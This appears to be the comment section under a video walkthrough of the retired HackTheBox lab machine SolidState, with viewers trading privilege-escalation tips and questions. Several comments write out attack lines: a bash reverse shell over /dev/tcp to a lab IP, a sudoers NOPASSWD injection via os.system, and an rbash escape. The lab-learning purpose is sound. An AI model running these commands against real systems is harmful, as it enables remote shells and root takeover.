So glad I watch your videos after rooting! I spent far too long getting a reverse shell to work from the .py script - the dash trick was very cool and something I've made a note of for future reference!

I'm sure you already found this out since this was almost a year ago, but you should be able to install 'gcc-multilib' on your host (kali) instance, and then you can compile your C code with the '-m32' gcc flag, which will compile your binary as a 32-bit binary. That way you won't need a 32-bit machine lying around. Another quick tip is that sometimes you'll have glibc version incompatibilities, and you can use the gcc flag '-D_GNU_SOURCE', which should use more portable versions of glibc that will likely be compatible with the victim machine you're running the code on.

Probably my favorite box sad they retired it :/ Love the vid, glad you can pass your knowledge down to the unlearned like me!

18:21 the reverse shell didn't work because the "/bin/bash -c" is missing .It should be os.system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.23/1234 0>&1' ")

This box was a lot of fun and was indeed fairly straightforward, my main problem was getting a stable shell as mindy as I didn't escape rbash like you did. Nonetheless I rooted this box fairly quick so that's a good thing!

I was working this box while you were recording the /bulb in the ssh login script was me lol

Thanks for the great walk through as usual ! I have one question thou. I'am not a Linux expert bur is any exploit you add to /etc/bash_completion.d will be executed once a user logs in ? or this is just specific to James exploit ? I remember reading that you can get a shell using bashrc or bash_auto-completion (not sure) if you can write files to Linux using FTP or any service that would allow you put files on the system. 26:10

How can we know /bin/dash can be checked? or is it a generic checklist based approach ?

Is the James exploit which is waiting for a James login supposed to get a James login by the box. Or can the file be dropped for something like user crontab or similar?

Interesting. When you get the exploit to run, you get a shell, but it's still the mindy user right? I actually found some python code to connect back to my box and put that in the /opt/tmp.py. Then, in order to get a root shell, I used the james exploit to run /opt/tmp.py whenever someone logged in. This way, I got a reverse shell as root. Not saying this way is better, it's probably a lot of unnecessary work. I like seeing different ways to priv esc, I've never seen that dash method before!

Nc didn’t return the shell because you specified 15-24 in your IPaddress - not 14-23 17:10

i cannot scan nmap or ping machine and some one work fine and other don't in hack the box (all the configuration is super i followed every steps why is that happening)

At 20:09 IppSec said that script runs every 3 minutes. Maybe I missed something, but where did he see that information?

Why in the world would 6 people downvote this...

Thanks for the video! I think there might be another privesc method I couldn't find any discussion on using CVE-2017-18190, since you can set up an ssh tunnel on port 631 to access the administration panel of CUPS 2.2.1. I might play around with it later and see but if anyone else has tried this I would like to know!

Hi, Ippsec, I don’t understand as the “/opt/tmp.py” was executed without being at cron job in 21:48. Can you tell me, please? Tks!

Just completed Solidstate yesterday and just watched this video. But I did tried to use bash or /bin/bash for rbash-escaping, it didn’t work for me. Seems bash is not in mindy’s bin...

4:26 ...I have done so much tr and sed for no reason... THERE'S A GNMAP OUTPUT?!?!? grep-able nmap format sounds so nice

I am doing this machine once again. You have gaps between ssh mindy and rbash escape you used before the James exploit. and thats why you could escape it with "bash" command.

22:00 shouldn't write to sudoes be enough? like: os.system( '/bin/echo "mindy ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers') sudo su - and ur root *shrug*

Curious what keyboard are you using?

lol @ 7:37. Did you win Netwars?

Is it can use evolution for see the email?

Couldn't connect to the mail server using thunderbird..

The suid of /bin/dash is not s now for this box ，so I can't use it for privilege escalation. I think htb should changed this in last month, that's really weird. Why didn't they just keep it.

thanks for another great video. So this py file is run every 3 mins. Nothing showed in the cron jobs, so aside from being curious as to what the file does due to the permissions, is there any way to identify files that are actioned by the system? thanks

Wow i wish i was good at regex. More practice needed i guess.

So how is it that you are able to serve a file from port 80 without having to configure port forwarding on your router?

Hey ippsec can you help me... Everytime i scan a machine from nmap it says "host seems down"... I don't know why

no james escalation :/ still great vid!

"the path of least resistance" 😂

bash doesn't work on my mindy shell x(

`BASH_CMDS[lala]=/bin/bash;lala;` will allow you to escape a restricted shell on older rbash versions

amazing video (y) can u tell which screen recorder you are using ?

Thanks Ippsec for the always awesome tuts! I modified the command at 5:08-5:510 to make life easier for myself and anyone that may need this as follows grep -oP '\d{1,5}/tcp' NmapOutput.nmap | tr -d ' ' | sed 's/\/tcp/,/g' | sed 's/.$//' We could probably use it with back tick in a script to have it all in 1 line nmap -p- --open 10.10.10.120 -T4 -oA NmapOutput3 && Portlist=`grep -oP '\d{1,5}/tcp' NmapOutput3.nmap | tr -d ' ' | sed 's/\/tcp/,/g' | sed 's/.$//'` && echo "value is:$Portlist" && nmap --script vuln -p$Portlist 10.10.10.120

Hello everybody, at min 10.33 Ippsec types bash to escape the rbash. This trick doesn't work for me. Is anybody having the same issue? How did you guys bypass it? Thank you for your time/help

well im kinda new to hacking and not so good i have watched 4-5 of your videos and im curius on how you learned that much and if its possible for a 17 years old like me to become a fantastic inspiration man like u in hacking i want to ask from where should i start what is the most useful knowledge cause i try for 1-2 weaks to take my first machine down and i suck i start feeling shitty i would like to hear some help from where to start or any tips to become better and understand the theory behind all this just 1 more question can i try this machines when they become retired somewhere else ? just to understand it cause i cant own machine or user :( so at least i want to practise

20:26 The script didn't catch the cron process apparently because the delay interval is so long that the cron starts and finishes before the script can detect it. I set the sleep period to .01 and it caught it ! Simple yet very effective script. You used another script that does this automatically but in a more professional way but I can't recall the script name :( And thannnnks dude :D

Good work Ipp. For anyone following along and not getting it make sure to log in with " ?????@10.10.10.51 -t bash --noprofile"

Haha, he said Nine vah. I thought it was where Jesus was from, Nineveh, or around d there. I wonder if they secretly had internet then. Feels like just the other day. 👨‍💻

Small inaccuracy escaping rbash, it's only because the exploit ran by another user, if it was a clean run you would have had to pop a rev she'll from a James exploit or at least run it yourself in order to bypass it with ctrlc.

is there a list or database for all the additions you put on your nmap (for ex. -sC, -sV)? thanks!

I think 2>&1 in your reverse shell will take care of the errors landing in the host session and should better detach from the user term

Hey Your simple nc reverse shell wasn't working because you entered the wrong ip in the first try

after root python script much simpler open user.txt and root.txt with py script and write it to txt file

This comments OMG... You all so smart but i doubt you can do 5% of what he's doing!

I got debian_chroot from (ssh username@IP -t "bash --noprofile"). Not from typing bash in mindy.